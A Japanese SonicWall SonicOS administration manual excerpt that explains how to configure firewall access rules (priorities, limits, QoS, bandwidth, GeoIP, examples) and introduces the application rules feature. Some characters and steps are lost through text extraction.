ゾーン間アクセスルールの大数の指定

すべてのゾーン間ペアの「アクセスルール」テーブルのサイズは設定可能ですが、ファイアウォー

ルプラットフォームごとに上限が定められています。ゾーン間のアクセスルールの大数を参照し

てください。

重要：この機能を正しく動作させるためには、ファイアウォールを再起動する必要があります。



大サイズを変更するには:

1 ゾーン間ペアを選択します。表の上にある淡い「大ルール数」アイコンが使用可能になり、

マウスの上にオレンジ色のアイコンが表示されます。

2 「大ルール数」アイコンを選択します。「大ルール数の変更」ダイアログが表示されます。

3 「大ルール数」フィールドに大数を入力します。


表の一番上にある「大ルール数」は、新しいカウントを表示します。

5 「更新」で、「再起動」を選択します。

ルールの優先順位の変更任意のビューで、アクセスルールは、も限定的なものがテーブルの一番上に、も限定的でない

ものが一番下になるように並べ替えられます。テーブルの一番下には「すべて」ルールが表示されます。ルールが多数ある場合は、特定の送信元および送信先ゾーンのルールのみを表示すると便利です。特定のゾーンのアクセスルールを表示するには、「マトリックス」または「送信先」 / 「送信

元」ドロップダウンメニューからゾーンを選択します。

ゾーン間のアクセスルールの大数

プラットフォームルールの大数

SM 9200/9400/9600 5000

NSA 2600/2650/3600/4600/5600/6600 2500

TZ300/TZ400/TZ500/TZ600TZ300W/TZ400W/TZ500W

1250

SOHO Wireless 250



アクセスルールの優先順位を変更するには:

1 「送信元」および「送信先」ドロップダウンメニューから特定の送信元および送信先ゾーンを

選択して指定します。「優先度」列には、「優先度」の数字とアイコンが含まれています。

2 アクセスルールの「優先順位」列にある優先順位アイコンを選択します。「優先順位の変更」

ダイアログが表示されます。

3 「優先順位」フィールドに新しい優先順位の数値 (1～10) を入力します。


アクセスルールの追加

ヒント：削除アイコンや編集アイコンが淡色表示されている (使用できない) 場合は、アクセス

ルールを変更したり、リストから削除したりすることはできません。

ヒント：着信 IP トラフィックを許可する個別アクセスルールは作成可能ですが、 SonicWall セキュリティ装置は、 SYN フラッドや Ping of Death 攻撃などの DoS 攻撃に対する保護を無効にして

いません。



アクセスルールを追加するには:

1 管理ビューで、「ポリシー | ルール > アクセスルール」に移動します。

2 「アクセスルール」テーブルの「追加」ボタンを選択します。「ルールの追加」ダイアログが

表示されます。

3 次の説明どおり、「アクセスルール」ダイアログの各画面で設定を行います。

• 一般設定の構成 (18 ページ)

• 詳細設定の構成 (20 ページ)

• QoS 設定値の構成 (21 ページ)

• 詳細帯域幅管理での帯域幅管理の設定 (22 ページ)

• グローバル帯域幅管理での帯域幅管理の設定 (24 ページ)

• GeoIP 設定値の構成 (24 ページ)

• ルールの追加 (25 ページ)



一般設定の構成1 「一般」画面の「設定」の下で、指定した IP トラフィックをルールによってどのように処理 (許

可または遮断) するかの「動作」を選択します。

• 許可 (既定)

• 禁止

• 破棄

2 「送信元」および「送信先」ドロップダウンメニューから送信元ゾーンと送信先ゾーンをそれ

ぞれ選択します。

3 「送信元ポート」ドロップダウンメニューから、選択されたサービスオブジェクト /グループで

定義されている送信元ポートを選択します。選択されたサービスオブジェクト /グループに

は、「サービス」ドロップダウンメニューで選択されているものと同じプロトコル種別が設定

されている必要があります。既定は「すべて」です。

サービスがリストに表示されていない場合は、次のいずれかを選択して「サービスの追加」ダイアログでサービスを定義する必要があります。

• サービスの作成 ( 「サービスの追加」ダイアログを表示する場合)。

• グループの作成 ( 「サービスグループの追加」ダイアログを表示する場合)。

4 「サービス」ドロップダウンメニューから、アクセスルールの影響を受けるサービスまたはサー

ビスのグループを選択します。「すべて」のサービスにはすべての IP サービスを含みます。

サービスがリストに表示されていない場合は、次のいずれかを選択して「サービスの追加」ダイアログでサービスを定義する必要があります。

• サービスの作成 ( 「サービスの追加」ダイアログを表示する場合)。

• グループの作成 ( 「サービスグループの追加」ダイアログを表示する場合)。

5 「送信元」ドロップダウンメニューから、アクセスルールの影響を受けるトラフィックの送信

元を選択します。

「ネットワークの作成」を選択すると、「アドレスオブジェクトの追加」ダイアログが表示さ

れます。

a オブジェクトの「名前」を指定し、「ゾーン割り当て」のゾーンを選択します。

b オブジェクトの「種別」を選択します。残りのフィールドは、選択したオブジェクトの種別によって異なります。各フィールドに入力した後、「OK」を選択します。

例えば、特定のユーザによるインターネットアクセスを制限するなどのアクセスルー

ルの影響を受ける送信元 IP アドレスを定義する場合は、次の操作を行います。

1) 「種別」ドロップダウンメニューから「範囲」を選択します。

2) 「アドレス範囲の開始」フィールドにアドレス範囲の開始 IP アドレスを、「アド

レス範囲の終了」フィールドにアドレス範囲の終了 IP アドレスを、それぞれ入力

します。

3) 「OK」を選択します。

6 「送信先」ドロップダウンメニューから、アクセスルールに影響されるトラフィックの送信先

を選択します。

ヒント：すべての IP アドレスを含めるには、アスタリスク (*) を「アドレス範囲の

開始」フィールドに入力します。



「ネットワークの作成」を選択すると、「アドレスオブジェクトの追加」ダイアログが表示さ

れます。

7 「包含ユーザ」ドロップダウンメニューから、アクセスルールで許可されるユーザまたはユー

ザグループを選択します。

8 「除外ユーザ」ドロップダウンメニューから、アクセスルールで拒否されるユーザまたはユー

ザグループを選択します。

9 「スケジュール」ドロップダウンメニューからスケジュールを選択します。既定のスケジュー

ルは「常に有効」です。

10 「コメント」フィールドに、アクセスルールの識別に有効な任意のコメントを入力します。

11 サービスの動作ログを有効にするには、「ログを有効にする」チェックボックスをオンにします。このオプションは、既定では選択されています。

12 「断片化パケットを許可する」チェックボックスは既定で選択されています。

13 このアクセスルールに一致するフローが「AppFlow 監視」ページと「AppFlow 報告」ページに

表示されるようにするには、「フロー報告を有効にする」チェックボックスをオンにします。このオプションは、既定では選択されていません。

14 このアクセスルールに一致するフローが「パケット監視」ページに表示されるようにするには、

「パケット監視を有効にする」チェックボックスをオンにします。このオプションは、既定では選択されていません。

15 管理トラフィックと非管理トラフィックの両方を有効にするには、「管理を有効にする」チェックボックスをオンにします。このオプションは、既定では選択されていません。

16 ボットネットフィルタを使用する場合は、「ボットネットフィルタを有効にする」チェックボッ

クスをオンにします。ボットネットフィルタの詳細については、『SonicOS セキュリティ構

成』ドキュメントの「セキュリティサービス > ボットネットフィルタ」を参照してくださ

い。このオプションは、既定では選択されていません。

17 このアクセスルールに一致するトラフィックで SIP 変換を有効にするには、「SIP 変換を有効に

する」チェックボックスをオンにします。このオプションは、既定では選択されていません。

既定では、 SIP クライアントは自身のプライベート IP アドレスを、 SIP プロキシ宛てに送信される

SIP (セッション開始プロトコル) セッション定義プロトコル (SDP) メッセージに使用します。 SIPプロキシがファイアウォールのパブリック (WAN) 側に配置されていて、 SIP クライアントが

ファイアウォールのプライベート (LAN) 側に配置されている場合、 SDP メッセージは変換され

ないため、 SIP プロキシは SIP クライアントに到達できません。 SIP 変換を有効にすると、プラ

イベート IP アドレスと割り当てられたポートを変更することによって、 SonicOS が SIP メッ

セージを LAN から WAN に変換するようにすることで、この問題を解決します。

SIP 変換の詳細については、『SonicOS システムセットアップ』マニュアルの「VOIP | SIP 設定」

セクションを参照してください。

18 このアクセスルールに一致するトラフィックで H.323 変換を有効にするには、「H.323 変換を

有効にする」チェックボックスをオンにします。このオプションは、既定では選択されていません。

19 詳細設定の構成 (20 ページ) に進んでください。

メモ：大きな IP パケットは、しばしば断片化されてからインターネット上でルーティン

グされ、送信先ホストで再編成されます。この設定を無効にする 1 つの理由として、

サービス拒否 (DoS) 攻撃で IP 断片化を悪用される可能性があるからです。



詳細設定の構成1 「詳細設定」を選択します。

2 アクセスルールで TCP 無動作期間経過後のタイムアウトを設定するには、「TCP 接続無動作時

タイムアウト (分)」フィールドに時間を分単位で設定します。既定値は 15 分です。

3 アクセスルールで UDP 無動作期間経過後のタイムアウトを設定するには、「UDP 接続無動作時

タイムアウト (分)」フィールドに時間を分単位で設定します。既定値は 30 分です。

4 「許可された接続数 ( 大接続数に対する%)」フィールドで、許可される接続数を SonicWall セキュリティ装置で許可される大接続数に対するパーセントで指定します。接続の制限の詳細については、接続の制限について (8 ページ) を参照してください。

5 「各送信元 IP アドレスに対する接続制限を有効にする」チェックボックスをオンにして、パケッ

ト破棄のしきい値を定義します。このしきい値を超えると、対応する送信元 IP からの接続とパ

ケットが破棄されます。小値は 0、大値は 65535、既定値は 128 です。このオプション

は、既定では選択されていません。

6 「各送信先 IP アドレスに対する接続制限を有効にする」チェックボックスをオンにして、パケッ

ト破棄のしきい値を定義します。このしきい値を超えると、対応する送信先 IP からの接続とパ

ケットが破棄されます。小値は 0、大値は 65535、既定値は 128 です。このオプション

は、既定では選択されていません。

7 このアクセスルールに対応する逆方向の (送信先ゾーンまたはアドレスオブジェクトから送信

元ゾーンまたはアドレスオブジェクトへの) アクセスルールを作成する場合は、「再帰ルール

を作成する」を選択します。このオプションは、既定では選択されていません。

8 「精密パケット検査 (DPI) スキャンをルール単位で無効にするには、「DPI を無効にする」チェッ

クボックスをオンにします。このオプションは、既定では選択されていません。

9 「認証されていないユーザからのトラフィックに対する動作」の下で：



• ルールに一致するトラフィックに SSO を使用しない場合は、「ユーザを認証するためにシ

ングルサインオンを起動しない」チェックボックスをオンにします。認証されていない

HTTP 接続は、ログインページに直接送信されます。

• SSO がルールと一致するトラフィックを持つユーザを識別しようとしている間に、ブラウ

ジングの遅延を避けるために、「ユーザを認証するためにシングルサインオンを待っている間はトラフィックを遮断しない」チェックボックスを選択します。この設定を有効にできるのは、「SSO を待つ間にトラフィックをブロックしない」場合と、「含まれる

対象:」のみです「選択したアクセスルール」は、 SSO エージェントの一般設定で設定し

ます。

• 「認証されていないユーザをログインにリダイレクトしない」チェックボックスをオンにすると、 SSO 経由でユーザを識別したり、ログインページにリダイレクトしたりするので

はなく、認証されていないユーザからの HTTP/HTTPS トラフィックがブロックされます。

10 QoS 設定値の構成 (21 ページ) に進んでください。

QoS 設定値の構成

1 このルールの対象となるトラフィックに DSCP または 802.1p サービス品質管理を適用する場合

は、「QoS」を選択します。

2 「DSCP 級割設定」で、「DSCP 級割の方針」をドロップダウンメニューから選択します。

• なし : パケットの DSCP 値は 0 にリセットされます。

• 維持 (既定) パケットの DSCP 値は変更されません。

• 指定: 「DSCP 値の指定」ドロップダウンメニューが表示されます。 0 ～ 63 の範囲の数値

を選択します。一般的な値には次のようなものがあります。

0 - 大努力型/既定 (既定値) 20 - 等級 2、銀 (AF22) 34 - 等級 4、金 (AF41)

8 - 等級 1 22 - 等級 2、銅 (AF23) 36 - 等級 4、銀 (AF42)

10 - 等級 1、金 (AF11) 24 - 等級 3 38 - 等級 4、銅 (AF43)

12 - 等級 1、銀 (AF12) 26 - 等級 3、金 (AF31) 40 - エキスプレス転送

14 - 等級 1、銅 (AF13) 27 - 等級 3、銀 (AF32) 46 - 緊急転送 (EF)



• 参照: ページには、「注：」が表示されます「ファイアウォール設定」 > 「QoS 割付」ペー

ジの QoS 割付設定が使用されます。

• 「802.1p 級割を DSCP 値に優先する」チェックボックスが表示されます。 DSCP 値が

802.1p 級割によってオーバーライドされるようにします。このオプションは、既

定では無効になっています。

3 「802.1p 級割の設定」で、「802.1p 級割の方針」をドロップダウンメニューから選択します。

• なし (既定) 802.1p タグ付けをパケットに追加しません。

• 維持: パケットの 802.1p 値は変更されません。

• 指定: 「802.1p 値の指定」ドロップダウンメニューが表示されます。次の 0 ～ 7 の範囲の

数値を選択します。

• 参照: ページには、「注：」が表示されます「ファイアウォール設定」 > 「QoS 割付」ペー

ジの QoS 割付設定が使用されます。

4 詳細帯域幅管理での帯域幅管理の設定 (22 ページ) またはグローバル帯域幅管理での帯域幅管理

の設定 (24 ページ) に進んでください。

詳細帯域幅管理での帯域幅管理の設定

1 「帯域幅管理」を選択します。

16 - 等級 2 30 - 等級 3、銅 (AF33) 48 - 制御用

18 - 等級 2、金 (AF21) 32 - 等級 4 56 - 制御用

0 - 大努力型 (既定値) 4 - 負荷制御型

1 - バックグラウンド型 5 - 映像型 (< 待ち時間 100ms)

2 - 倹約型 6 - 音声型 (< 待ち時間 10ms)

3 - 高努力型 7 - ネットワーク制御型

メモ：帯域幅管理種別として「グローバル」を指定している場合は、グローバル帯域幅管理での帯域幅管理の設定 (24 ページ) を参照してください。



2 送信トラフィックで帯域幅管理を有効にするには、「送信帯域幅管理を有効にする ( 「許可」

ルールのみ)」チェックボックスをオンにします。このオプションは、既定では無効になって

います。

a 「帯域幅オブジェクト」ドロップダウンメニューから帯域幅オブジェクトを選択します。

新しい帯域幅オブジェクトを作成するには、「帯域幅オブジェクトの作成」を選択します。帯域幅オブジェクトの作成の詳細については、帯域幅オブジェクトの設定 (220 ペー

ジ) を参照してください。

3 受信トラフィックで帯域幅管理を有効にするには、「受信帯域幅管理を有効にする ( 「許可」


います。

a 「帯域幅オブジェクト」ドロップダウンメニューから帯域幅オブジェクトを選択します。

新しい帯域幅オブジェクトを作成するには、「帯域幅オブジェクトの作成」を選択します。

4 帯域幅使用状況を追跡にするには、「帯域幅使用状況の追跡を有効にする」チェックボックスをオンにします。このオプションは、既定では無効になっています。このオプションを選択する場合は、「帯域幅管理を有効にする」オプションのどちらかまたは両方を選択する必要があります。

5 GeoIP 設定値の構成 (24 ページ) に進んでください。



グローバル帯域幅管理での帯域幅管理の設定

1 「帯域幅管理」を選択します。

2 送信トラフィックで帯域幅管理を有効にするには、「送信帯域幅管理を有効にする ( 「許可」


います。

a 「帯域幅優先順位」ドロップダウンメニューで、帯域幅優先順位を選択します。高の優

先順位は「0 リアルタイム」で、これが既定値です。低の優先順位は「7 低」です。

3 受信トラフィックで帯域幅管理を有効にするには、「受信帯域幅管理を有効にする ( 「許可」


います。

a 「帯域幅優先順位」ドロップダウンメニューで、帯域幅優先順位を選択します。高の優

先順位は「0 リアルタイム」で、これが既定値です。低の優先順位は「7 低」です。

4 GeoIP 設定値の構成 (24 ページ) に進んでください。

GeoIP 設定値の構成

1 「地域 IP」を選択します。

2 このルールに一致するトラフィックにフィルタを適用するには、「地域 IP フィルタ」を有効に

します。

3 このルールでグローバル地域 IP 国リストを適用するには、「グローバル」を選択します。

メモ：帯域幅管理種別として「詳細」を指定している場合は、詳細帯域幅管理での帯域幅管理の設定 (22 ページ) を参照してください。

メモ：地域 IP フィルタをセキュリティサービスで指定して、すべてのトラフィックまたはポリ

シーごとに適用することができます。詳細については、『SonicOS セキュリティ構成』のドキュ

メントの「地域 IP フィルタの設定」を参照してください。



4 このポリシーでユーザ定義地域 IP 国リストを指定するには、「ユーザ定義」を選択します。

「地域 IP フィルタを有効にする」および「ユーザ定義」を選択すると、「利用可能な国」と

「選択した国」フィールドが有効になります。

a 国を選択するには、「利用可能な国」リストで国を選択し、「選択した国」フィールドにドラッグします。

b 「選択した国」リストから国を削除するには、国を選択し「利用可能な国」へドラッグします。

5 どの既知の国にも一致しないトラフィックを遮断するには、「未定義国を遮断する」を選択します。

6 ルールの追加 (25 ページ) に進んでください。

ルールの追加1 「ルールの追加」ダイアログの下部で、「追加」を選択してルールを追加します。ルールが追

加されると、ダイアログボックスに「ルール動作が完了しました。ルールテーブルを確認してください。」というメッセージが表示されます。

2 「閉じる」を選択してダイアログを閉じます。

3 テーブルに目的のルールが追加されていることを確認します。



アクセスルールの編集

アクセスルールを編集するには、以下の手順に従います。


2 アクセスルールの「設定」列で「編集」アイコンを選択します。「ルールの追加」ダイアログ

と同じ設定の「ルールの編集」ダイアログが表示されます。

3 変更を加えます。




個別アクセスルールの削除

1 つまたは複数のユーザ定義アクセスルールを削除するには：


2 単独の個別アクセスルールを削除するには、設定列の「削除」アイコンを選択します。

3 選択したユーザ定義のアクセスルールを削除するには、削除するルールのチェックボックスを

オンにし、「削除」ドロップダウンリストから「選択した項目の削除」を選択します。この選

択は、いずれかの個別アクセスルールのチェックボックスをオンにするまでは淡色表示になっ

ています。

4 すべてのユーザ定義のアクセスルールを削除するには、「削除」ドロップダウンリストから

「すべて削除」を選択します。

個別アクセスルールの有効化と無効化アクセスルールは、管理ビューの「ポリシー | ルール > アクセスルール」ページで有効または無効に

できます。

• ユーザ定義アクセスルールを有効にするには、その行の「有効」列のチェックボックスをオン

にします。

• ユーザ定義アクセスルールを無効にするには、その行の「無効」列のチェックボックスをオン

にします。

アクセスルールの既定の設定の復元

エンドユーザがゾーンについて設定したアクセスルールをすべて削除するには：


2 「マトリックス」アイコンを選択するか、「送信元/送信先」オプションを使用して、すべての

ゾーンまたは特定のゾーンの組み合わせを選択します。

3 ページの上部にある「復旧」アイコンを選択します。これにより、選択したゾーンの組み

合わせのアクセスルールが、ファイアウォールで初に設定された既定のアクセスルールに

復元され、 SonicOS によって追加されます。確認メッセージが表示されます。


メモ：既定のアクセスルールは削除できません。



アクセスルールのトラフィック統計の表示管理ビューの「ポリシー | ルール > アクセスルール」ページで、マウスポインタを「設定」列で

「統計」アイコンに移動し、アクセスルールの受信 (Rx) トラフィックと送信 (Tx) トラフィックの

統計情報を表示します。

• 受信バイト

• 受信パケット

• 送信バイト

• 送信パケット

統計情報のカウンタをクリアしてカウントを再開するには、表の上部にある「クリア」アイコン


アクセスルールの設定例このセクションでは、次のようなネットワークアクセスルールを追加する設定例を示します。

• Ping の有効化 (28 ページ)

• 特定のサービスへの LAN アクセスの遮断 (28 ページ)

• LAN ゾーンからの WAN プライマリ IP アクセスの許可 (29 ページ)

Ping の有効化

このセクションでは、 DMZ 上の機器が Ping 要求を送信して LAN 上の機器から Ping 応答を受信するこ

とを許可するアクセスルールの設定例を示します。既定では、 SonicWall ネットワークセキュリティ

装置は、 DMZ から開始され LAN に到達するトラフィックを許可しません。

DMZ と LAN の間の ping を許可するアクセスルールを設定するには、次の手順を実行します。

1 インターフェースのいずれかを DMZ ゾーン内に配置します。


2 「追加」を選択して「ルールの追加」ダイアログを表示します。

3 「許可」ラジオボタンを選択します。

4 「サービス」ドロップダウンメニューから、「Ping」を選択します。

5 「送信元」ドロップダウンメニューから、「DMZ サブネット」を選択します。

6 「送信先」ドロップダウンメニューから、「LAN サブネット」を選択します。

7 「追加」を選択します。

特定のサービスへの LAN アクセスの遮断このセクションでは、業務時間中に LAN からインターネット上の NNTP サーバへのアクセスを遮断す

るアクセスルールの設定例を示します。



スケジュールに基づいて LAN から NNTP サーバへのアクセスを遮断するアクセスルールを

設定するには、以下の手順に従います。



3 「動作」の設定から「拒否」を選択します。

4 「サービス」ドロップダウンメニューから「NNTP (ニュース)」を選択します。サービスがリス

トに表示されていない場合は、「サービスの追加」ダイアログでサービスを追加する必要があります。

5 「送信元」ドロップダウンメニューから「すべて」を選択します。

6 「送信先」ドロップダウンメニューから「WAN」を選択します。

7 「スケジュール」ドロップダウンメニューからスケジュールを選択します。

8 「コメント」フィールドに任意のコメントを入力します。


LAN ゾーンからの WAN プライマリ IP アクセスの許可

アクセスルールを作成すると、同じファイアウォールに関して、あるゾーンの管理 IP アドレスに対

する別のゾーンからのアクセスを許可することができます。例えば、 LAN 側からの WAN IP アドレス

への Ping や HTTP/HTTPS 管理を許可することができます。そのためには、アクセスルールを作成し

て、ゾーン間でそのサービスを許可し、送信先として 1 つまたは複数の明示的な管理 IP アドレスを指

定する必要があります。あるいは、送信先として 1 つまたは複数の管理アドレス (WAN プライマリ

IP、すべての WAN IP、すべての X1 管理 IP など) が含まれるアドレスグループを指定することもでき

ます。このタイプのルールは、ゾーン間での HTTP 管理、 HTTPS 管理、 SSH 管理、 Ping、および SNMPのサービスを可能にするものです。

LAN ゾーンからの WAN プライマリ IP へのアクセスを許可するルールを作成するには、以下

の手順に従います。


2 「マトリックス」アイコンを選択するか、「送信元/送信先」オプションを使用して、「LAN >WAN」アクセスルールを選択します。


4 「動作」の設定から「許可」を選択します。

5 「サービス」メニューから次のサービスのいずれかを選択します。

• HTTP

• HTTPS

• SSH 管理

• Ping

• SNMP

6 「送信元」メニューから「すべて」を選択します。

メモ：アクセスルールはゾーン間管理についてのみ設定できます。ゾーン内管理はインター

フェース設定によりインターフェース単位で制御されます。



7 「送信先」メニューから 1 つまたは複数の明示的な WAN IP アドレスが含まれるアドレスグルー

プまたはアドレスオブジェクトを選択します。

8 「包含ユーザ」メニューからアクセスを許可するユーザまたはグループを選択します。

9 「スケジュール」メニューからスケジュール時刻を選択します。

10 「コメント」フィールドに任意のコメントを入力します。


アクセスルールでの帯域幅管理の有効化

帯域幅管理は、アクセスルールを使用して受信トラフィックと送信トラフィックの両方に適用できま

す。じょうごアイコンが表示されているアクセスルールは、帯域幅管理用に設定されたものです。

帯域幅管理の設定については、『SonicOS セキュリティ設定』ドキュメントの「ファイアウォール設

定 > 帯域幅管理」セクションを参照してください。

メモ： WAN プライマリサブネットなどのサブネットを表すアドレスグループやア

ドレスオブジェクトは選択しないでください。それでは、 WAN 管理 IP アドレスへ

のアクセスではなく、既定で許可されている WAN サブネットの機器へのアクセス

を許可することになります。

ヒント：あるゾーンの複数のインターフェースに帯域幅管理を設定する場合、設定したゾーンの保証帯域幅が、そのゾーンにバインドされているインターフェースで利用可能な帯域幅を超えるような設定は行わないでください。



2

アプリケーションルールポリシーの

設定

• アプリケーションルールについて (32 ページ)

• アプリケーションルールとは？ (32 ページ)

• アプリケーションルールのメリット (34 ページ)

• アプリケーション制御の仕組み (35 ページ)

• アプリケーションルールとアプリケーション制御のライセンス (39 ページ)

• 用語 (41 ページ)

• ルール > アプリケーションルール (42 ページ)

• アプリケーションルールポリシーの設定 (42 ページ)

• アプリケーションルールウィザードを使用する (45 ページ)

• アプリケーションルール設定の確認 (45 ページ)

• 便利なツール (46 ページ)

• アプリケーションルールの使用例 (51 ページ)

• 一致オブジェクトでの正規表現の作成 (52 ページ)

• ポリシーベースのアプリケーションルール (53 ページ)

• アプリケーションシグネチャベースポリシーのログ (54 ページ)

• コンプライアンスの施行 (55 ページ)

• サーバの保護 (55 ページ)

• ホストされる電子メール環境 (55 ページ)

• 電子メール制御 (56 ページ)

• ウェブブラウザ制御 (57 ページ)

• HTTP POST 制御 (58 ページ)

• 禁止するファイルタイプ制御 (60 ページ)

• ActiveX コントロール (62 ページ)

• FTP 制御 (64 ページ)

• 帯域幅管理 (70 ページ)

• DPI を迂回する (70 ページ)

• 個別のシグネチャ (72 ページ)

• リバースシェル悪用の防御 (75 ページ)


アプリケーションルールポリシーの設定31

アプリケーションルールについてこのセクションでは、 SonicOS におけるアプリケーションルール機能の概要について説明します。

トピック :

• アプリケーションルールとは？ (32 ページ)

• アプリケーションルールのメリット (34 ページ)

• アプリケーション制御の仕組み (35 ページ)

• アプリケーションルールとアプリケーション制御のライセンス (39 ページ)

• 用語 (41 ページ)

アプリケーションルールとは？アプリケーションルールは、アプリケーションシグネチャのポリシールールを設定するためのソ

リューションを提供します。アプリケーションルールは、アプリケーション固有のポリシーのセッ

トとして、ユーザ、電子メールアドレス、スケジュール、および IP サブネットの各レベルのネット

ワークトラフィックをきめ細かく制御できるようにします。このアプリケーション層アクセス制御

機能の主な目的は、ウェブブラウジング、ファイル転送、電子メール、および電子メール添付ファ

イルを制限することにあります。

アプリケーション層トラフィックを SonicOS で制御できる機能が、リアルタイムのアプリケーション

トラフィックフローを表示できる機能や、アプリケーションシグネチャデータベースにアクセスし

たりアプリケーション層ルールを作成したりする新しい方法によって大幅に強化されています。SonicOS では、すべてのネットワークトラフィックにわたって制御をより強化するために、アプリ

ケーション制御と標準のネットワーク制御機能が統合されています。

トピック :

• アプリケーションルールポリシー (32 ページ)

• アプリケーションルールの性能について (33 ページ)

アプリケーションルールポリシー

SonicOS では、アプリケーションルールポリシーを作成してネットワーク内のアプリケーションを制

御するために以下の方法を提供しています。

• 「ルール > アプリケーションルール - ルール > アプリケーションルール」ページでは、アプリ

ケーションルールポリシーを作成する方法を提供しています。アプリケーションルールの対

象が拡大されているのは、一致オブジェクトや動作オブジェクト、場合によっては電子メール

アドレスオブジェクトもポリシーに組み込まれているからです。柔軟性を高めるために、アプ

リケーションポリシーは、「ルール > アプリケーション制御」ページで利用できる任意の種

別、アプリケーション、またはシグネチャで同じアプリケーション制御にアクセスできます。「オブジェクト > 一致オブジェクト」ページは、アプリケーションルールポリシーで一致オ

ブジェクトとして使用するアプリケーションリストオブジェクト、アプリケーション種別リ

ストオブジェクト、およびアプリケーションシグネチャリストオブジェクトを作成する方法

メモ：アプリケーションルールは、 SuperMassive、 NSA、 TZ300 以上の TZ シリーズアプライアン

スでサポートされています。



を提供します。「一致オブジェクト」ページでは、ネットワークトラフィック内のコンテンツ

を照合するための正規表現も設定できます。「オブジェクト > 動作オブジェクト」ページで

は、ポリシーで使う個別動作を作成できます。

• 「ルール > アプリケーション制御 - ルール > アプリケーション制御」ページでは、アプリケー

ション制御ポリシーを作成する方法を提供しています。詳細については、アプリケーション制御の設定 (80 ページ) を参照してください。

• 「アプリケーションルールガイド - アプリケーションルールガイド (ウィザード ) は、アプリ

ケーションルールポリシーの安全な設定を一般的な多くの使用事例について提供しますが、

あらゆる使用事例に対応しているわけではありません。

アプリケーションルールの性能について

アプリケーションルールのデータ漏洩抑止コンポーネントは、ファイルやドキュメントをスキャン

してコンテンツやキーワードを探す機能を備えています。アプリケーションルールを使用すると、

特定のファイル名、ファイルの種類、電子メール添付ファイル、添付ファイルの種類、特定の件名を持つ電子メール、特定のキーワードまたはバイトパターンを含む電子メールまたは添付ファイルの

転送を制限できます。内部または外部ネットワークアクセスを各種の条件に基づいて禁止できま

す。パケット監視を使ってアプリケーショントラフィックを詳細に調査可能で、アプリケーション

によって使われるネットワーク帯域を削減するために様々な帯域幅管理設定が選択可能です。

アプリケーションルールは、 SonicWall の Reassembly-Free Deep Packet Inspection ™ (RF-DPI) 再組み立てが

不要な精密パケット検査技術に基づいて、ポリシーベースの個別動作を作成することを可能にするインテリジェントな防御機能も提供します。個別動作の例を次に示します。

• シグネチャに基づくアプリケーション全体の遮断

• アプリケーション機能またはサブコンポーネントの遮断

• ファイルの種類ごとの帯域幅調整 (HTTP または FTP プロトコルを使用する場合)

• 添付ファイルの遮断

• 個別遮断ページの送信

• 個別電子メール応答の送信

• HTTP 要求のリダイレクト

• FTP 制御チャンネルでの個別 FTP 応答の送信

アプリケーションルールは、アプリケーションレベルのアクセス制御、アプリケーション層帯域幅

管理、およびデータ漏洩の抑止機能を主に提供する一方で、個別のアプリケーション一致またはプロトコル一致のシグネチャを作成する機能も備えています。プロトコルの固有の部分を照合することで、任意のプロトコルに対応する個別アプリケーションルールポリシーを作成できます。個別のシ

グネチャ (72 ページ) を参照してください。

アプリケーションルールは、機密文書が誤って転送されるのを防ぐための優れた機能を提供しま

す。例えば、 Outlook Exchange の自動アドレス補完機能を使用している場合、一般的な名前に対して

誤ったアドレスが補完されてしまうことはよくあります。例については、 Outlook Exchange の自動ア

ドレス補完を参照してください。



Outlook Exchange の自動アドレス補完

アプリケーションルールのメリットアプリケーションルール機能には、次のような利点があります。

• アプリケーションベースの設定により、アプリケーション制御用のポリシーの設定が容易で

ある。

• アプリケーションルール購読サービスによって新しい攻撃の出現時に更新されたシグネチャが

提供される。

• 「装置の健全性 | ライブ監視」の「監視」ビュー見られるような、関連するアプリケーションインテリジェンス機能が 30 日間無料トライアルのアプリケーション可視化ライセンスとして登

録時に利用できる。これにより、任意の登録済み SonicWall 装置でネットワーク内のアプリ

ケーショントラフィックに関する情報を明確に表示できる。アプリケーション可視化およびア

プリケーション制御のライセンスは、 SonicWall セキュリティサービスライセンスのバンドル

にも含まれています。

• 同じアプリケーションの他のシグネチャに影響を与えることなく個々のシグネチャのポリシー設定を行えます。

• アプリケーションルールおよびアプリケーション制御の設定ページは、「ポリシー | ルール」および「ポリシー | オブジェクトメニューで利用可能です。これらは管理インターフェースに

あり、すべてのファイアウォールとアプリケーション制御のアクセスルールとポリシーを同じ

エリアに統合します。

アプリケーションルール機能は、 3 つの主要な製品種別と比較することができます。

• スタンドアロンプロキシ装置

• ファイアウォール VPN 装置に統合されたアプリケーションプロキシ

• 個別のシグネチャがサポートされるスタンドアロン IPS 装置

通常、スタンドアロンプロキシ装置は、特定のプロトコルに対してきめ細かいアクセス制御を提供

するように設計されています。 SonicWall アプリケーション制御は、 HTTP、 FTP、 SMTP、 POP3 などの

複数のプロトコルにわたってアプリケーションレベルのきめ細かいアクセス制御を提供します。ア

プリケーション制御はファイアウォール上で動作するため、受信トラフィックと送信トラフィックの両方を制御できます。これに対し、専用のプロキシ装置は、一方向にのみ配備されるのが一般的です。「アプリケーションルール」と「アプリケーション制御」を使用したアプリケーション制御

は、専用のプロキシアプライアンスよりも優れたパフォーマンスとスケーラビリティを提供しま

す。これらは SonicWall の専用技術に基づいているからです。

メモ： SonicOS 管理インターフェースをアクティブにするには、この機能を有効にする必

要があります。



今日の統合アプリケーションプロキシでは、アプリケーションレベルのきめ細かいアクセス制御、

アプリケーション層帯域幅管理、およびデジタル権利管理機能は提供されません。専用プロキシ装置の場合と同様、 SonicWall アプリケーション制御は、統合アプリケーションプロキシソリューション

よりもはるかに高いパフォーマンスとスケーラビリティを提供します。

一部のスタンドアロン IPS 装置ではプロトコルデコードサポートが提供されていますが、アプリケー

ションレベルのきめ細かいアクセス制御、アプリケーション層帯域幅管理、およびデジタル権利管

理機能をサポートする製品は存在しません。

アプリケーションルールを SonicWall Email Security と比較した場合、それぞれに利点があります。 EmailSecurity は SMTP に対してのみ有効ですが、非常に幅広いポリシー空間を利用できます。アプリケー

ションルールは、 SMTP、 POP3、 HTTP、 FTP、およびその他のプロトコルに対して有効で、ファイア

ウォール上の SonicOS に統合され、 Email Security よりも高いパフォーマンスを発揮します。ただし、

アプリケーションルールでは、 Email Security において SMTP に対して提供されるポリシーオプション

がすべて提供されるわけではありません。

アプリケーション制御の仕組みアプリケーションルールおよびアプリケーション制御では、 SonicOS の精密パケット検査を利用し

て、ゲートウェイを通過するアプリケーション層ネットワークトラフィックをスキャンし、設定さ

れているアプリケーションに一致するコンテンツを検索します。一致するものが見つかると、これらの機能は設定されている動作を実行します。アプリケーションルールポリシーの設定時には、アプ

